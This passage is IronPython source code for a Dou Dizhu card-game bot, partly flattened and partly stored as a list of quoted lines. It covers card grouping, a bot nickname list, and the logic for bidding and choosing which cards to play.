lastCards.append(card) return lastCards def convertVerctor(self, handCard, vector): """将牌转至vector对象->void""" for card in handCard: vector.add(self.getCardSize(card), card) def getSingleCard(self, handCard, vector): """取出单牌至vector对象,返回剩余牌->[]""" return self.getSameCard(handCard, 1, vector) def getSameCard(self, handCard, num, vector): """取相同的牌,返回剩余牌\n@num:相同的个数->[]""" lastCards = [] arr = [] count = len(handCard) if count < 2: if count > 0 and num == 1: card = handCard[0] vector.add(self.getCardSize(card), card) return arr; else: return handCard for i in range(0, count): card = handCard[i] if i == 0: arr.append(card) continue precard = handCard[i-1] val = self.getCardSize(card) preval = self.getCardSize(precard) if val == preval: arr.append(card) else: if len(arr) == num: if num == 1: vector.add(preval, arr[0]) else: vector.add(preval, arr) else: self.copyList(arr, lastCards) arr = [] arr.append(card) if count-1 == i: if len(arr) == num: if num == 1: vector.add(val, arr[0]) else: vector.add(val, arr) else: self.copyList(arr, lastCards) return lastCards def getCard(self, handCard, cardVal, vector): """取出指定大小的牌至vector对象,返回剩余牌->[]\n@cardId:搜索指定牌大小""" arr = [] count = len(handCard) for i in range(0, count): card = handCard[i] val = self.getCardSize(card) if val == cardVal: vector.add(val, card) else: arr.append(card) return arr def getCardHandleTimes(self, handCard): """计算出牌手数->int""" vector = self.splitCard(handCard) return self.getVectorHandleTimes(vector) def getVectorHandleTimes(self, vector): """计算出牌手数->int\n@vector:拆牌后的vector对象""" times = 0 if vector.get('wang').len() > 0: times = times + 1 bombLen = vector.get('bomb').len() if bombLen > 0: times = times + bombLen #四带2 times = times + vector.get('shun').len() threeLen = vector.get('three').len() if threeLen > 0: times = times + threeLen twoLen = vector.get('two').len() if twoLen > 0: times = times + twoLen oneLen = vector.get('one').len() if oneLen > 0: times = times + oneLen times = times - threeLen * 1 return 
times def getSingleCount(self, vector): """计算单牌数->int""" return vector.get('one').len() def getTwoCount(self, vector): """计算对牌数->int""" return vector.get('two').len()
[ "import clr, sys, types\r\n", "clr.AddReference('System')\r\n", "clr.AddReference('ZyGames.Framework.Common');\r\n", "clr.AddReference('ZyGames.Framework')\r\n", "clr.AddReference('ZyGames.Framework.Game')\r\n", "clr.AddReference('ZyGames.Doudizhu.Model')\r\n", "from ZyGames.Framework.Common.Log import *\r\n", "from System.Collections.Generic import *\r\n", "from ZyGames.Doudizhu.Model import *\r\n", "from ZyGames.Framework.Cache.Generic import *\r\n", "from ZyGames.Framework.Game.Cache import *\r\n", "\r\n", "class CardVector():\r\n", " \"\"\"牌储存结构,ex:2:[202,102],3:[203,103]\"\"\"\r\n", " def __init__(self, type):\r\n", " \"\"\"@type:结构类型wang,bomb,shun,three,two,one\"\"\"\r\n", " self.__type = type\r\n", " self.__data = {}\r\n", "\r\n", " def addChild(self, vector):\r\n", " key = vector.__type\r\n", " if key:\r\n", " self.__data[key] = vector\r\n", "\r\n", " def len(self):\r\n", " return len(self.__data.keys())\r\n", "\r\n", " def add(self, key, cards):\r\n", " self.__data[key] = cards\r\n", " \r\n", " def hasKey(self, key):\r\n", " return self.__data.has_key(key)\r\n", "\r\n", " def get(self, key):\r\n", " return self.__data[key]\r\n", "\r\n", " def remove(self, key):\r\n", " del self.__data[key]\r\n", "\r\n", " def clear(self):\r\n", " return self.__data.clear()\r\n", " \r\n", " def getItems(self):\r\n", " return self.__data.items()\r\n", "\r\n", " def getKeys(self):\r\n", " keys = self.__data.keys()\r\n", " keys.sort()\r\n", " return keys\r\n", "\r\n", " def getFirstVal(self):\r\n", " keys = self.getKeys()\r\n", " if len(keys) > 0:\r\n", " return self.get(keys[0])\r\n", " return None\r\n", "\r\n", " def getLasttVal(self):\r\n", " keys = self.getKeys()\r\n", " if len(keys) > 0:\r\n", " return self.get(keys[len(keys)-1])\r\n", " return None\r\n", "\r\n", " def getGreaterThan(self, k):\r\n", " \"\"\"取出大于k的牌->obj或[]\"\"\"\r\n", " keys = self.getKeys()\r\n", " for key in keys:\r\n", " if key > k:\r\n", " return self.get(key)\r\n", " return []\r\n", " \r\n", " def 
getMaxGreaterThan(self, k):\r\n", " \"\"\"取出大于k的最大的牌->obj或[]\"\"\"\r\n", " keys = self.getKeys()\r\n", " for i in range(len(keys)-1, -1,-1):\r\n", " key = keys[i]\r\n", " if key > k:\r\n", " return self.get(key)\r\n", " return []\r\n", "\r\n", " def getList(self):\r\n", " list = []\r\n", " keys = self.getKeys()\r\n", " for key in keys:\r\n", " val = self.get(key)\r\n", " if type(val) == types.ListType:\r\n", " for t in val:\r\n", " list.append(t)\r\n", " else:\r\n", " list.append(val)\r\n", " return list\r\n", " \r\n", " def getIndexVal(self, index):\r\n", " keys = self.getKeys()\r\n", " if len(keys) > index:\r\n", " return self.get(keys[index])\r\n", " return None\r\n", "\r\n", "class AIConfig():\r\n", " @staticmethod\r\n", " def getConfig(name):\r\n", " return AIConfig.__config[name]\r\n", " \r\n", " __config = {\r\n", " \"nickName\": ['雪舞№枫红','夜舞&倾城','魅影い冰绝','残恋々ら','匰身ァ饚З','走鐹菂蕗_','无语づ肴','传じ☆ve说','恋☆鵷:鶵','≮梦★羽≯','莞镁主题曲〃','o┢┦apΡy','幽魂邀絮】','So丶滚吧','無話可說。','花╮开一夏','▋潶禮菔▍','倾世恋流年','訫侑所属丶','命里缺沵','柔情似水似','淫大代表','钢茎混凝凸','∫安雅轩 *','查 无 此 人','上帝是个妞','_她入他心','___髅ㄦ〤','三分淑女范','﹋落花伊人','吃货不痴货','〃逢床作戏╮','屌丝先森 ぃ','资格让皒哭','╰︶情兽〤','得瑟的尛孩纸','好小伙中国造','情非得已り','夏兮兮°','等着你来宠','安小夕 ▽','堇色流年丿','如歌亦如梦','墨染锦年╮','独自沉沦 ∞','乱世°妖娆','夏沫"Smile','七分笑三分真','沫尐诺⌒_⌒','___大苹果','德玛→西亚','Oo草丛伦oO','菊★花№信','_提莫必须死','嘉文四阿哥_','轮子┱妈','稻__草人','乌┣┰┝鸦','┣死歌┰┝','爱~。~射','炮-,-娘','oO小萝莉','狗头人Oo','大々‖嘴','大虫子','扇子Oo妈','冰鸟','船长','女剑','女枪','男枪','风女','卡萨丁','阿卡丽','卡特琳娜','伊泽瑞尔','戴安娜','安妮','凯特琳','贾克斯','卡萨丁','拉克丝','易大师','莫甘娜','奈德丽','索拉卡','提莫','潘森','泰达米尔','佛拉基米尔','崔斯塔娜','(=@__@=)哪里','丽桑桌','奎因','扎克','维嘉','墨菲特','索菲娅','阿狸','影流之主'],\r\n", " \"head\": ['head_1001','head_1002','head_1003','head_1004','head_1005','head_1006','head_1007','head_1008','head_1009','head_1010','head_1011','head_1012','head_1013','head_1014','head_1015','head_1016','head_1017','head_1018','head_1019','head_1020']\r\n", " }\r\n", "\r\n", "class CardAILogic():\r\n", " \"\"\"斗地主AI逻辑\"\"\"\r\n", " def __init__(self, roomId, tableId, positionId):\r\n", " 
self.__table = None\r\n", " self.__pos = None\r\n", " self.__nextPos = None\r\n", " self.__prePos = None\r\n", " self.__playerNum = 3\r\n", " self.__Landlord = None\r\n", " self.__CK = 13\r\n", " self.__CA = 14\r\n", " self.__C2 = 15#2子\r\n", " self.__CW1 = 18\r\n", " self.__CW2 = 19\r\n", " self.__role = 0#处于地主的位置\r\n", " self.__largestCardSize = self.__CW2\r\n", "\r\n", " roomStruct = MemoryCacheStruct[RoomData]()\r\n", " key = str(roomId)\r\n", " roomData = None\r\n", " result = roomStruct.TryGet(key)\r\n", " if result[0]:\r\n", " roomData = result[1]\r\n", " resultTable = roomData.Tables.TryGetValue(tableId)\r\n", " if resultTable[0]:\r\n", " self.__table = resultTable[1]\r\n", " self.__playerNum = self.__table.PlayerNum\r\n", "\r\n", " if self.__table and positionId < self.__table.Positions.Length:\r\n", " tempCard = 0\r\n", " for pos in self.__table.Positions:\r\n", " if pos.IsLandlord:\r\n", " self.__Landlord = pos\r\n", " if pos.Id == positionId:\r\n", " self.__pos = pos\r\n", " #计算最大牌\r\n", " if pos.CardData and pos.CardData.Count > 0:\r\n", " lastCardVal = pos.CardData[pos.CardData.Count-1] % 100\r\n", " if lastCardVal > tempCard:\r\n", " tempCard = lastCardVal\r\n", " if tempCard > 0:\r\n", " self.__largestCardSize = tempCard\r\n", "\r\n", " if self.__Landlord and self.__pos:\r\n", " index = (self.__pos.Id + 1) % self.__playerNum \r\n", " self.__nextPos = self.__table.Positions[index]\r\n", " preindex = (self.__pos.Id + self.__playerNum - 1) % self.__playerNum \r\n", " self.__prePos = self.__table.Positions[preindex]\r\n", " #计算role处在0:地主,-1:上家,1:下家位置\r\n", " if self.__Landlord.Id == self.__pos.Id:\r\n", " self.__role = 0\r\n", " elif self.__Landlord.Id == self.__nextPos.Id:\r\n", " self.__role = -1\r\n", " else:\r\n", " self.__role = 1\r\n", "\r\n", " def writeLog(self, msg):\r\n", " #todo test\r\n", " TraceLog.WriteComplement(msg)\r\n", "\r\n", " def getCardSize(self, card):\r\n", " \"\"\"获取牌大小->int\"\"\"\r\n", " return card % 100\r\n", "\r\n", " def 
getOutCardData(self):\r\n", " \"\"\"出牌对象->CardData\"\"\"\r\n", " return self.__table.PreCardData\r\n", " \r\n", " def getOutCardResult(self):\r\n", " \"\"\"获取已出牌记录->List<CardData>\"\"\"\r\n", " return self.__table.OutCardList\r\n", "\r\n", " def getUserCard(self):\r\n", " \"\"\"获取玩家手上的牌->List<int>\"\"\"\r\n", " return self.__pos.CardData\r\n", "\r\n", " def getUserRole(self):\r\n", " \"\"\"玩家角色,0:地主,-1:上家,1:下家位置\"\"\"\r\n", " return self.__role\r\n", " \r\n", " def getNextPosCardCount(self):\r\n", " \"\"\"获取玩家下家牌数->int\"\"\"\r\n", " return self.__nextPos.CardData.Count\r\n", " \r\n", " def getPrePosCardCount(self):\r\n", " \"\"\"获取玩家上家牌数->int\"\"\"\r\n", " return self.__prePos.CardData.Count\r\n", "\r\n", " def checkCall(self):\r\n", " \"\"\"检查能否叫地主->bool\"\"\"\r\n", " #火箭为8分,炸弹为6分,大王4分,小王3分,一个2为2分\r\n", " bigCardValue = 0#大牌权值\r\n", " cards = self.getUserCard()\r\n", " times = self.__table.MultipleNum / 2\r\n", " bomCards = []\r\n", " bombvct = CardVector('bomb')\r\n", " self.getBombCard(cards, bombvct)\r\n", " bomCards.append(bombvct.getList())\r\n", " wangvct = CardVector('wang')\r\n", " self.getWangBombCard(cards, wangvct)\r\n", " bomCards.append(wangvct.getList())\r\n", " c2 = CardVector('c2')\r\n", " self.getCard(cards, self.__C2, c2)\r\n", " c2Count = len(c2.getList())\r\n", "\r\n", " for bom in bomCards:\r\n", " if len(bom) == 4:\r\n", " bigCardValue = bigCardValue + 6\r\n", " elif len(bom) == 2:\r\n", " bigCardValue = bigCardValue + 8\r\n", " if len(bomCards) == 0:\r\n", " if wangvct.hasKey(self.__CW2):\r\n", " bigCardValue = bigCardValue + 4\r\n", " if wangvct.hasKey(self.__CW1):\r\n", " bigCardValue = bigCardValue + 3\r\n", " if c2Count < 4:\r\n", " bigCardValue = bigCardValue +(c2Count * 2)\r\n", " if(bigCardValue >= 7 and times < 3)\\\r\n", " or (bigCardValue >= 5 and times < 2)\\\r\n", " or (bigCardValue >= 2 and times < 1):\r\n", " return True\r\n", " return False\r\n", "\r\n", " def searchOutCard(self):\r\n", " 
\"\"\"出牌搜索,牌组0:为空,1:单牌,2:对牌,3:王炸,4:三张,5:三带一,6:三带二,7:炸弹,8:顺子,9:四带二,10:连对,11:飞机,12:飞机带二,13:二连飞机带二对\"\"\"\r\n", " resultCards = []\r\n", " handCard = self.getUserCard()\r\n", " if not handCard or len(handCard) == 0:\r\n", " return resultCards\r\n", " myCardCount = len(handCard)\r\n", " handleTimes = self.getCardHandleTimes(handCard)\r\n", " preOutCard = self.getOutCardData()#当前已的出牌\r\n", " outCardResult = self.getOutCardResult()\r\n", " role = self.getUserRole()\r\n", " nextPosCardCount = self.getNextPosCardCount()\r\n", " prePosCardCount = self.getPrePosCardCount()\r\n", " nextIsLand = self.__nextPos.IsLandlord\r\n", " landlord = self.__Landlord\r\n", " landlordCardCount = self.__prePos.CardData.Count\r\n", "\r\n", " if not preOutCard or preOutCard.PosId == self.__pos.Id:\r\n", " #任意出牌\r\n", " outVct = CardVector('')\r\n", " resultCards = self.freeOutCard(handCard)\r\n", " cardCount = len(resultCards)\r\n", " if (role==0 and (nextPosCardCount == 1 or prePosCardCount ==1) and cardCount==1)\\\r\n", " or (role!=0 and nextIsLand and nextPosCardCount == 1 and cardCount==1)\\\r\n", " or (role!=0 and landlord.CardData.Count == 1 and cardCount==1):\r\n", " #不能出比最大牌小的单牌\r\n", " resultCards = []\r\n", " self.getTwoCard(handCard, outVct)\r\n", " if outVct.len() > 0:\r\n", " self.copyList(outVct.getFirstVal(), resultCards)\r\n", " else:\r\n", " #最大单牌\r\n", " cards = self.getLargeSingleCard(handCard, self.__CA)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " else:\r\n", " self.copyList(handCard[len(handCard)-1], resultCards)\r\n", "\r\n", " elif (role==0 and (nextPosCardCount == 2 or prePosCardCount ==2) and cardCount==2 and myCardCount > 2)\\\r\n", " or (role!=0 and nextIsLand and nextPosCardCount == 2 and cardCount==2 and myCardCount > 2)\\\r\n", " or (role!=0 and landlord.CardData.Count == 2 and cardCount==2 and myCardCount > 2):\r\n", " #不能出小于最大牌的对子\r\n", " cardval = self.getCardSize(resultCards[0])\r\n", " if cardval < self.__CA and cardval < 
self.__largestCardSize:\r\n", " resultCards = []\r\n", " bombvct = CardVector('')\r\n", " lastCards = self.getBombCard(handCard, bombvct)\r\n", " if myCardCount < 6 and bombvct.len() > 0:\r\n", " self.copyList(bombvct.getFirstVal(), resultCards)\r\n", " self.getSingleCard(lastCards, outVct)\r\n", " if outVct.len() > 0:\r\n", " self.copyList(outVct.getFirstVal(), resultCards)\r\n", " else:\r\n", " resultCards.append(handCard[0])\r\n", " elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 1:\r\n", " #自己手上大于6张,且同家剩1张时出单牌\r\n", " resultCards = []\r\n", " resultCards.append(handCard[0])\r\n", " elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 2 and self.__pos.OutTwoTimes == 0:\r\n", " #自己手上大于6张,且同家剩2张配合对家出对次数为0时出对子\r\n", " self.getTwoCard(handCard, outVct)\r\n", " if outVct.len() > 0:\r\n", " resultCards = []\r\n", " self.__pos.OutTwoTimes = self.__pos.OutTwoTimes + 1\r\n", " self.copyList(outVct.getFirstVal(), resultCards)\r\n", " else:\r\n", " pass\r\n", " #self.writeLog('%s:%s' % ('任意出牌' ,resultCards))\r\n", "\r\n", " elif preOutCard.Type == 3:\r\n", " #王炸\r\n", " return resultCards\r\n", " else:\r\n", " outcardType = preOutCard.Type\r\n", " islandlordOut = preOutCard.PosId == landlord.Id\r\n", " if role == 0:\r\n", " #地主压牌\r\n", " if handleTimes < 3 or (nextPosCardCount == 2 and outcardType == DeckType.Double)\\\r\n", " or (nextPosCardCount == 1 and outcardType == DeckType.Single):\r\n", " #压牌\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard)\r\n", " elif nextPosCardCount < 7 or prePosCardCount < 7:\r\n", " #压牌不打炸\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard, True)\r\n", " else:\r\n", " #跟牌\r\n", " resultCards = self.followOutCard(preOutCard, handCard)\r\n", " elif role < 0:\r\n", " #地主上家出牌\r\n", " #a)当自己只差2手时压牌,或者地主小于3张且出对时压牌;或者地主小于6张并且打单或对且对家不是最大牌时压牌\r\n", " #b)农民同家出牌大于等于A时不跟\r\n", " if handleTimes < 3 or\\\r\n", " (landlordCardCount <= 2 and outcardType == DeckType.Double and 
(islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\\\r\n", " (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\\\r\n", " landlordCardCount <= 2:\r\n", " #压牌\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard)\r\n", " elif (landlordCardCount < 7 and islandlordOut and (outcardType == DeckType.Double or outcardType == DeckType.Single) ):\r\n", " #压牌不打炸\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard, True)\r\n", " else:\r\n", " if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \\\r\n", " or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\\\r\n", " or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2):\r\n", " #不跟\r\n", " return resultCards\r\n", " #跟牌\r\n", " resultCards = self.followOutCard(preOutCard, handCard)\r\n", " else:\r\n", " #地主下家出牌,当地主小于3张\r\n", " if handleTimes < 3 or (islandlordOut and landlordCardCount <= 2):\r\n", " #压牌\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard)\r\n", " elif (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\\\r\n", " (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)):\r\n", " #压牌不打炸\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard, True)\r\n", " else:\r\n", " if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \\\r\n", " or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\\\r\n", " or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2):\r\n", " #不跟\r\n", " return resultCards\r\n", " #跟牌\r\n", " resultCards = self.followOutCard(preOutCard, handCard)\r\n", "\r\n", " return resultCards\r\n", " \r\n", " def copyList(self, list, clist, index=0, count=0):\r\n", " \"\"\"@list: copy源,\\n@clist: copy目标\\@index:开始位置\\n@count:数量\"\"\"\r\n", 
" if type(list) == types.ListType:\r\n", " i = 0\r\n", " for val in list:\r\n", " if count > 0 and len(clist) == count:\r\n", " break\r\n", " if i >= index:\r\n", " clist.append(val)\r\n", " i = i+1\r\n", " elif list:\r\n", " clist.append(list)\r\n", "\r\n", " def getLargeSingleCard(self, handCard, minval):\r\n", " \"\"\"单牌倒打->[]\"\"\"\r\n", " result = []\r\n", " #先打2\r\n", " verctor = CardVector('')\r\n", " handTime = self.getCardHandleTimes(handCard)\r\n", " self.getCard(handCard, self.__C2, verctor)\r\n", " if handTime > 3 and verctor.len() > 0 and minval < self.__C2:\r\n", " result.append(verctor.getFirstVal())\r\n", " else:\r\n", " verctor = CardVector('')\r\n", " wangvct = CardVector('')\r\n", " bombvct = CardVector('')\r\n", " #排除炸\r\n", " lastCards = self.getBombCard(handCard, bombvct)\r\n", " lastCards = self.getWangBombCard(lastCards, wangvct)\r\n", " self.convertVerctor(lastCards, verctor)\r\n", " if verctor.len() > 0:\r\n", " tempCard = verctor.getMaxGreaterThan(minval)\r\n", " if tempCard:\r\n", " self.copyList(tempCard, result)\r\n", " return result\r\n", " #self.copyList(bombvct.getFirstVal(), result)\r\n", " #if len(result) == 0:\r\n", " # self.copyList(wangvct.getList(), result)\r\n", " return result\r\n", " \r\n", " def freeOutCard(self, handCard):\r\n", " \"\"\"自由出牌,先飞机,连对,顺子,三张,对子,单牌->[]\"\"\"\r\n", " vector = self.splitCard(handCard)\r\n", " val = 0\r\n", " resultCards = []\r\n", " #判断剩余2手牌时是否是有炸或王炸\r\n", " handTimes = self.getVectorHandleTimes(vector)\r\n", " if handTimes < 3:\r\n", " #王炸\r\n", " resultCards = self.outWangBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #取炸\r\n", " resultCards = self.outBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #先出最大的对或单\r\n", " vectorMax = CardVector('Max')\r\n", " self.getCard(handCard, self.__largestCardSize, vectorMax)\r\n", " if vectorMax.len() > 0:\r\n", " if vector.get('two').hasKey(self.__largestCardSize):\r\n", " 
self.copyList(vector.get('two').get(self.__largestCardSize), resultCards)\r\n", " if len(resultCards) == 0 and vector.get('one').hasKey(self.__largestCardSize):\r\n", " self.copyList(vector.get('one').get(self.__largestCardSize), resultCards)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", "\r\n", " resultCards = self.processOutCard(vector, DeckType.FlyAndTwo, val, 8)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.FlyAndTwoDouble, val, 10)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Fly, val, 6)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Liandui, val, 6)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Shunzi, val, 5)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " #三张是A以上的牌时,先出其它类型牌\r\n", " c2Cards = []\r\n", " resultCards = self.processOutCard(vector, DeckType.ThreeAndOne, val, 3)\r\n", " if len(resultCards) > 0:\r\n", " if handTimes > 2 and self.getCardSize(resultCards[0]) >= self.__CA:\r\n", " c2Cards = resultCards\r\n", " resultCards = []\r\n", " else:\r\n", " return resultCards\r\n", " if len(c2Cards) == 0:\r\n", " resultCards = self.processOutCard(vector, DeckType.ThreeAndTwo, val, 3)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Three, val, 3)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = []\r\n", " #只差一对\r\n", " if len(handCard) == 2:\r\n", " resultCards = self.processOutCard(vector, DeckType.Double, val, 2)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " #是否有四带2\r\n", " bombCards = self.processOutCard(vector, DeckType.Bomb, val, 4)\r\n", " if handTimes < 5 and len(bombCards) > 0:\r\n", " resultCards = 
[]\r\n", " self.copyList(bombCards, resultCards)\r\n", " oneCount = self.getSingleCount(vector)\r\n", " twoCount = self.getTwoCount(vector)\r\n", " if oneCount > 1:\r\n", " self.copyList(vector.get('one').getIndexVal(0), resultCards)\r\n", " self.copyList(vector.get('one').getIndexVal(1), resultCards)\r\n", " return resultCards\r\n", " elif twoCount == 1 and oneCount ==1:\r\n", " onetemp = vector.get('one').getFirstVal()\r\n", " twotemp = vector.get('two').getFirstVal()\r\n", " if self.getCardSize(onetemp) > self.getCardSize(twotemp[0]):\r\n", " self.copyList(twotemp, resultCards)\r\n", " return resultCards\r\n", " else:\r\n", " self.copyList(onetemp, resultCards)\r\n", " self.copyList(twotemp[0], resultCards)\r\n", " return resultCards\r\n", "\r\n", " elif twoCount > 0:\r\n", " self.copyList(vector.get('two').getList(), resultCards)\r\n", " return resultCards\r\n", " else:\r\n", " resultCards = []\r\n", "\r\n", " #是否出对或单\r\n", " singleCards = self.processOutCard(vector, DeckType.Single, val, 1)\r\n", " twoCards = self.processOutCard(vector, DeckType.Double, val, 2)\r\n", " if len(twoCards) > 0 and len(singleCards) > 0\\\r\n", " and self.getCardSize(singleCards[0]) > self.getCardSize(twoCards[0]):\r\n", " return twoCards\r\n", " elif len(singleCards) > 0:\r\n", " return singleCards\r\n", " elif len(twoCards) > 0:\r\n", " return twoCards\r\n", "\r\n", " resultCards = self.processOutCard(vector, DeckType.Bomb, val, 4)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", "\r\n", " if len(c2Cards) == 0:\r\n", " resultCards = c2Cards\r\n", " return resultCards\r\n", "\r\n", " def followOutCard(self, preOutCard, handCard):\r\n", " \"\"\"跟对方的出牌,不出对2或3张2->[]\"\"\"\r\n", " type = preOutCard.Type\r\n", " val = preOutCard.CardSize\r\n", " count = preOutCard.Cards.Length\r\n", " vector = self.splitCard(handCard)\r\n", " resultCards = self.processOutCard(vector, type, val, count, 0)\r\n", " if len(resultCards) > 1:\r\n", " if type != DeckType.Single\\\r\n", " and 
self.getCardSize(resultCards[0]) == self.__C2:\r\n", " resultCards = []#不出\r\n", " return resultCards\r\n", " \r\n", " def processOutCard(self, vector, type, minval, mincount, maxcount=20):\r\n", " \"\"\"处理牌组出牌规则->[]\\n@vector:vector对象集合,@type:出牌类型,\\n@minval:,\\n@mincount:,\\n@maxcount:为0时压牌,否则任意出\"\"\"\r\n", " resultCards = []\r\n", " cards = []\r\n", " if type == DeckType.Single:\r\n", " cards = self.getMoreThanCardVal(vector.get('one'), minval, mincount)\r\n", " if len(cards) > 0:\r\n", " resultCards.append(cards[0])\r\n", " elif type == DeckType.Double:\r\n", " cards = self.getMoreThanCardVal(vector.get('two'), minval, mincount/2)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " elif type == DeckType.WangBomb:\r\n", " return resultCards\r\n", " elif type == DeckType.Three:\r\n", " cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " elif type == DeckType.ThreeAndOne:\r\n", " cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3)\r\n", " onevct = vector.get('one')\r\n", " if len(cards) > 0 and onevct.len() > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " resultCards.append(onevct.getFirstVal())\r\n", " elif type == DeckType.ThreeAndTwo:\r\n", " cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3)\r\n", " twovct = vector.get('two')\r\n", " if len(cards) > 0 and twovct.len() > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " self.copyList(twovct.getFirstVal(), resultCards)\r\n", " elif type == DeckType.Bomb:\r\n", " cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " elif type == DeckType.Shunzi:\r\n", " shunvct = vector.get('shun')\r\n", " keys = shunvct.getKeys()\r\n", " for key in keys:\r\n", " cards = shunvct.get(key)\r\n", " resultCards = self.getMoreThanShunCard(cards, minval, mincount, 
maxcount)\r\n", " if len(resultCards) > 0:\r\n", " break\r\n", " elif type == DeckType.FourAndTwo:\r\n", " cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4)\r\n", " onevct = vector.get('one')\r\n", " twovct = vector.get('two')\r\n", " if len(cards) > 0 and (onevct.len() > 1 or twovct.len() > 0):\r\n", " self.copyList(cards, resultCards)\r\n", " if onevct.len() > 1:\r\n", " self.copyList(onevct.getIndexVal(0), resultCards)\r\n", " self.copyList(onevct.getIndexVal(1), resultCards)\r\n", " else:\r\n", " for i in range(0,2):\r\n", " self.copyList(twovct.getIndexVal(i), resultCards)\r\n", " elif type == DeckType.Liandui:\r\n", " twovct = vector.get('two')\r\n", " resultCards = self.getMoreThanCardVal(twovct, minval, mincount/2, maxcount)\r\n", " elif type == DeckType.Fly\\\r\n", " or type == DeckType.FlyAndTwo\\\r\n", " or type == DeckType.FlyAndTwoDouble:\r\n", " #处理飞机\r\n", " threevct = vector.get('three')\r\n", " if threevct.len() > 1:\r\n", " mcount = 0\r\n", " attrVector = None\r\n", " if type == DeckType.FlyAndTwo:\r\n", " attrVector = vector.get('one')\r\n", " mcount = mincount / (3+1)\r\n", " elif type == DeckType.FlyAndTwoDouble:\r\n", " attrVector = vector.get('two')\r\n", " mcount = mincount / (3+2)\r\n", " else:\r\n", " mcount = mincount / 3\r\n", "\r\n", " if mcount > 1:\r\n", " threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount)\r\n", " if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount:\r\n", " attrcount = 0\r\n", " tempArr = []\r\n", " attrkeys = attrVector.getKeys()\r\n", " for key in attrkeys:\r\n", " if attrcount == mcount:\r\n", " break\r\n", " self.copyList(attrVector.get(key),tempArr)\r\n", " attrcount = attrcount + 1\r\n", " if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)):\r\n", " self.copyList(threeCards, resultCards)\r\n", " self.copyList(tempArr, resultCards)\r\n", " else:\r\n", " pass\r\n", " return resultCards\r\n", " \r\n", " def 
enforceOutCard(self, preOutCard, handCard, ignoreBomb=False):\r\n", " \"\"\"压对方的牌->list\\n@ignoreBomb:是否排除炸\"\"\"\r\n", " resultCards = []\r\n", " type = preOutCard.Type\r\n", " minval = preOutCard.CardSize\r\n", " cardCount = preOutCard.Cards.Length\r\n", " return self.processEnforceOutCard(handCard, type, minval, cardCount, ignoreBomb)\r\n", "\r\n", " def processEnforceOutCard(self, handCard, type, minval, cardCount, ignoreBomb):\r\n", " \"\"\"处理压对方的牌->list\"\"\"\r\n", " resultCards = []\r\n", " vector = CardVector('')\r\n", "\r\n", " #判断剩余牌是否是炸或王炸\r\n", " handTimes = self.getCardHandleTimes(handCard)\r\n", " if handTimes < 3:\r\n", " #取炸\r\n", " resultCards = self.outBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #王炸\r\n", " resultCards = self.outWangBombCard(handCard)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", "\r\n", " if type == DeckType.Single:\r\n", " #最大单牌\r\n", " self.copyList(self.getLargeSingleCard(handCard, minval),resultCards)\r\n", " elif type == DeckType.Double:\r\n", " self.getTwoCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " self.copyList(vector.getGreaterThan(minval),resultCards)\r\n", " else:\r\n", " self.getTwoCard(handCard, vector, True)\r\n", " if vector.len()>0:\r\n", " self.copyList(vector.getGreaterThan(minval),resultCards)\r\n", " elif type == DeckType.WangBomb:\r\n", " return resultCards\r\n", " elif type == DeckType.Three:\r\n", " self.getThreeCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " self.copyList(vector.getGreaterThan(minval),resultCards)\r\n", " elif type == DeckType.ThreeAndOne:\r\n", " lessCards = self.getThreeCard(handCard, vector)\r\n", " if 